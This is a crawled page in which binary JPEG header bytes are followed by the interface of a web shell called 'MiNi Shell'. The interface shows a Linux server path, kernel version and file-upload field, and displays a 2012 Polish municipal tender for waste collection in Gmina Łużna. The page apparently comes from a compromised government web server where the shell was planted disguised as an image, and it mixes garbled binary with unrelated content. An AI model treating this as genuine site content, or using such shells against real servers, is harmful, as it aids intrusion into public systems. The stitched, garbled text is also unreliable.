JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121107/234603-N-2012.html

<p class="kh_header"><b>Łużna: Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Łużna w roku 2013</b><br>
<b>Numer ogłoszenia: 234603 - 2012; data zamieszczenia: 07.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łużna , Łużna 634, 38-322 Łużna, woj. małopolskie, tel. 018 3543922, faks 018 3543039.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> BIP Gminy Łużna</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Łużna w roku 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA 

2.1. Charakterystyka Gminy Łużna
	2.1.1 Powierzchnia Gminy Łużna wynosi 56,24 km2
	2.1.2 Liczba mieszkańców 8500 w tym w zabudowie jednorodzinnej 99 % 
	2.1.3 Gmina liczy 6 wsi: Łużna, Szalowa, Bieśnik, Biesna, Mszanka, Wola Łużańska.
	2.1.4 Liczba podmiotów gospodarczych i instytucji 119 ( nieruchomości niezamieszkałych na
                      których powstają odpady )

2.2 Szczegółowy opis przedmiotu zamówienia:
	2.2.1 Odpady powstałe na nieruchomościach zamieszkałych przez mieszkańców odbierane 	          będą przez Wykonawcę w następujący sposób :

	a. Odpady Niesegregowane zmieszane :
- z kontenerów samochodowych PK- 10 o pojemności 10 m3, kontenery powyższe w ilości 45 szt. rozmieszczone są we wszystkich sołectwach Gminy Łużna i są własnością zamawiającego, każdy kontener opisany jest Nr, który ułatwia zgłoszenie i dojazd do wywozu , lokalizacja zgodna z zał. nr 3 i 4 , do kontenerów umożliwiony jest dobry utwardzony dojazd samochodem specjalistycznym do wywozu kontenerów. Utrzymanie czystości w obrębie kontenera oraz utrzymanie jego czystości i dezynfekcji zgodnie z obowiązującymi przepisami będzie należało do obowiązku wykonawcy i ma być wliczone w koszt wykonania usługi wywozu i zagospodarowania odpadów. Zamówienie na wykonanie wywozu będzie składane telefonicznie w miarę potrzeb. Usunięcie, opróżnienie kontenera i odwrotne zwrócenie na miejsce lokalizacji należy wykonać w ciągu 48 godz. od momentu telefonicznego zgłoszenia przez Urząd Gminy. 
Średnia szacunkowa częstotliwość opróżniania wszystkich kontenerów ok. 877szt.(8770 m3) w ciągu roku, wsie o największej częstotliwości wywozu; Łużna i Szalowa

b. Odpady segregowane; szkło kolorowe, plastik, papier :
		- z pojemników ogólnodostępnych o poj. 1,1 m3 koloru ;
			N i e  b i e s k i   z przeznaczeniem na papier i tekturę
		Ż ó ł t y   z przeznaczeniem na tworzywa sztuczne i folię 
		Z i e l o n y    z przeznaczeniem na szkło i opakowania szklane kolorowe ,
         Przedmiotowe pojemniki zabezpiecza Wykonawca i wstawia komplet 3 szt. w każdej wsi w centrum obok kontenerów:
  			Wieś Łużna centrum obok kontenera Nr 1 
			Wieś Szalowa centrum obok kontenera Nr 13
			Wieś Bieśnik centrum obok kontenera Nr 9 
			Wieś Biesna centrum obok kontenera nr 15
			Wieś Mszanka centrum obok kontenera nr 22
			Wieś Wola Łużańska centrum obok kontenera Nr 42 
	Utrzymanie czystości w obrębie pojemników oraz utrzymanie ich czystości i dezynfekcji 	zgodnie z obowiązującymi przepisami będzie należało do obowiązku wykonawcy i ma być wliczone w koszt wykonania usługi wywozu i zagospodarowania odpadów.
Zamówienie na wykonanie wywozu będzie składane telefonicznie w miarę potrzeb. Usunięcie, opróżnienie pojemników należy wykonać w ciągu 48 godz. od momentu telefonicznego zgłoszenia przez Urząd Gminy. 
Średnia szacunkowa częstotliwość opróżniania wszystkich pojemników ok. 220 szt.(220 m3) w ciągu roku


	c. Odpady segregowane szkło kolorowe, plastik, papier i odpady niebezpieczne: 
-odbierane będą przez wykonawcę na punktach mobilnych selektywnego zbierania z worków lub innych pojemników z odnotowaniem prze Wykonawcę właściciela nieruchomości , frakcji i ilości przekazywanego odpadu .
Przedmiotowy wykaz Wykonawca przekazuje Zamawiającemu wraz z Fakturą przy miesięcznym rozliczaniu usługi.

	Punkty mobilne selektywnego zbierania zlokalizowano: 
	Sołectwo Łużna		- parking  k. budynku Urzędu Gminy.
	Sołectwo Szalowa		- wieś Szalowa parking w centrum wsi k. kapliczki
					- wieś Bieśnik Folwark skrzyżowanie 
	Sołectwo Biesna 		- parking w centrum wsi .
	Sołectwo Wola Łużańska	- plac obok budynków Domu ludowego i OSP. 
	Sołectwo Mszanka		- parking w centrum wsi k. Domu Ludowego  

Terminy i godziny czynnych punktów mobilnych ustalone zostają poniższym Harmonogramem 
			
H A R M O N O G R A M
Terminów i godzin otwarcia mobilnych punktów odbioru segregowanych odpadów (frakcje szkło kolorowe,plastik, papier i odpady niebezpieczne) na terenie Gminy Łużna w roku 2013. 

Przy ustalaniu terminów zachowana pozostaje zasada:

	- w Sołectwie Łużna 
		 każdy pierwszy poniedziałek przypadający na dzień roboczy  II , III i IV kwartału 
		 tj. 8 kwietnia, 1 lipca, 7 października w godzinach od 10-tej do 17 tej.
              	 Miejsce parking k. Urzędu Gminy.

- w Sołectwie Szalowa
wieś Szalowa każdy pierwszy wtorek przypadający na dzień roboczy II, III i IV 	kwartału tj. 2 kwietnia , 2 lipca , 1 października w godzinach od 10-tej do 17 -tej. 	Miejsce parking koło kapliczki.
		wieś Bieśnik każdy drugi wtorek przypadający na dzień roboczy II, III, i IV kwartału 
		tj. 9 kwietnia , 9 lipca , 8 października w godzinach od 10 do 17 - tej.
		Miejsce Folwark skrzyżowanie 

	 - w Sołectwie Biesna 
każda pierwsza środa przypadająca na dzień roboczy II, III i IV kwartału tj.3 kwietnia, 3 lipca , 2 października w godzinach od 10-tej do 17 -tej.
		Miejsce parking w centrum wsi 

	- w Sołectwie Wola Łużańska 
		każdy pierwszy czwartek przypadający na dzień roboczy II, III, i IV kwartału 
		tj.4 kwietnia , 4 lipca , 3 października w godzinach od 10-tej do 	17 tej. 
		Miejsce plac obok Domu Ludowego.

	- w Sołectwie Mszanka
każdy pierwszy piątek przypadający na dzień roboczy II , III i IV kwartału tj. 5 kwietnia, 5 lipca, 4 października w godzinach od 10 tej 	do 17 tej. 
		Miejsce parking k. Domu Ludowego.

Średnia szacunkowa ilośc odbieranych odpadów zgodnie z deklaracjami mieszkańców określa się na ok. 390 m3 na w ciągu roku

d. Odpady wielkogabarytowe i wielomateriałowe w tym  sprzęt RTV i AGD
przedmiotowe odpady wystawiane będą na  pobocza dróg i jeden raz w roku w okresie wiosny odbierane w czasie Akcji Porządek przeprowadzanej w terminach zgodnie z wcześniejszym ogłoszeniem Obowiązek odbioru tych odpadów ponosi wykonawca, zamawiający przed ogłoszeniem akcji ustali terminy jej realizacji z wykonawcą 
Ilość odpadów zebranych w Akcji Porządek określa się na ok. 80 m3.

2.2.2 Odpady powstałe na nieruchomościach niezamieszkałych przez mieszkańców odbierane będą przez Wykonawcę w następujący sposób:
a. Odpady segregowane i zmieszane od właściciele nieruchomości niezamieszkałych (podmioty gospodarcze i instytucja ) będą  gromadzą w pojemnikach wstawionych na nieruchomości przez właściciela. Normatywna podstawowa wielkość pojemnika 1,1 m3 (pojemnik przystosowany do odbiorów odpadów samochodem specjalistycznym. Dopuszcza się zgodnie z potrzebami możliwość wstawienia innego większego pojemnika umożliwiającego odbiór odpadów 
 samochodem specjalistycznym.

	b. Odpady segregowane powstające w szkołach gromadzone i odbierane będą z pojemników o poj.1,1 m3 koloru ;
			N i e  b i e s k i   z przeznaczeniem na papier i tekturę
		Ż ó ł t y   z przeznaczeniem na tworzywa sztuczne i folię 
		Z i e l o n y    z przeznaczeniem na szkło i opakowania szklane kolorowe ,
Przedmiotowe pojemniki zabezpiecza Wykonawca i wstawia komplet 3 szt. w każdej szkole na terenie Gminy Łużna  w miejscu uzgodnionym z dyrektorem szkoły .
  			Zespół Szkół w Łużnej
			Szkoła Podstawowa Nr 2 w Łużnej
			Zespół Szkół w Szalowej
			Szkoła Podstawowa w Bieśniku
			Szkoła Podstawowa w Biesnej 
			Szkoła Podstawowa w Mszance
			Szkoła Podstawowa w Woli Łużańskiej 
c. Odpady wymienione w pkt 2.2.2 p. pkt a, b odbierane będą przez Wykonawcę 1 raz w miesiącu lub rzadziej ( według potrzeb) z odnotowaniem przez Wykonawcę właściciela nieruchomości, frakcji i ilości przekazywanego odpadu.
Przedmiotowy wykaz Wykonawca przekazuje Zamawiającemu wraz z Fakturą przy miesięcznym rozliczaniu usługi.

Średnia szacunkowa ilość odbieranych odpadów zgodnie z deklaracjami właścicieli nieruchomości niezamieszkałych określa się na ok. 475 m3 w ciągu roku. 
W tym segregowanych 160 m3.
	   
	Wykaz i adresy właścicieli nieruchomości niezamieszkałych (podmioty i instytucje) od których będą odbierane odpady określony zostaje w załączniku nr 5.

2.3	Zagospodarowanie odpadów.
2.3.1	W ramach zagospodarowanie odpadów komunalnych zmieszanych Wykonawca Odbierający odpady zobowiązany jest do przekazywania odebranych odpadów oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej lub zastępczej regionalnej instalacji do przetwarzania odpadów komunalnych właściwej dla rejonu sądecko - gorlickiego zgodnie z Uchwałą Nr XXV/398/12 Sejmiku Województwa Małopolskiego z dnia 2 lipca 2012 r. 
2.3.2	W ramach zagospodarowania odpadów zbieranych selektywnie (segregowanych) Wykonawca odbierający odpady zobowiązany jest do ich przekazania do instalacji odzysku.
2.4	Zamawiający zaleca aby Wykonawca dokonał wizji lokalnej w miejscach realizacji przedmiotu zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.40.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 10.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że posiada zaświadczenie o wpisie do rejestru działalności regulowanej w zakresie odbierania 	odpadów od właścicieli nieruchomości z terenu Gminy Łużna.

Sprawdzenie w/w warunku udziału w posterowaniu odbywać się będzie na podstawie złożonych dokumentów wg zasady spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej dwie usługi wartości powyżej 300 000,00 zł słownie trzysta tysięcy złotych każda w zakresie niezbędnym do spełnienia warunków wiedzy i doświadczenia, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu przetargowym, a jeżeli okres prowadzenia działalności jest krótszy- w tym zakresie, z podaniem ich wartości, przedmiotu usługi dat wykonania i odbiorców załączeniem dokumentu potwierdzającego , że ulgi zostały wykonane lub SA wykonywane należycie. 
	
Sprawdzenie w/w warunku udziału w posterowaniu odbywać się będzie na podstawie 	złożonych dokumentów (wykaz wykonanych usług, referencje ) wg zasady spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku zamawiający uzna pisemne oświadczenie wykonawcy w tym zakresie wg zał. nr 7
Sprawdzenie ww. warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonego oświadczenia wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku zamawiający uzna pisemne oświadczenie wykonawcy w tym zakresie wg zał. nr 7
Sprawdzenie ww. warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonego oświadczenia wg zasady spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie powyższego warunku zamawiający uzna pisemne oświadczenie wykonawcy w tym zakresie wg zał. nr 7
Sprawdzenie ww. warunków udziału w postępowaniu odbywać się będzie na podstawie przedłożonego oświadczenia wg zasady spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany urzędowej wysokości stawki podatku VAT, na wniosek Wykonawcy, zostanie sporządzony aneks do umowy uwzględniający zmiany wartości umowy wynikające z tego tytułu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> BIP Gminy Łużna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łużna, 38-322 Łużna 634 pk. Nr 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 09:00, miejsce: Urząd Gminy Łużna, pok. Nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com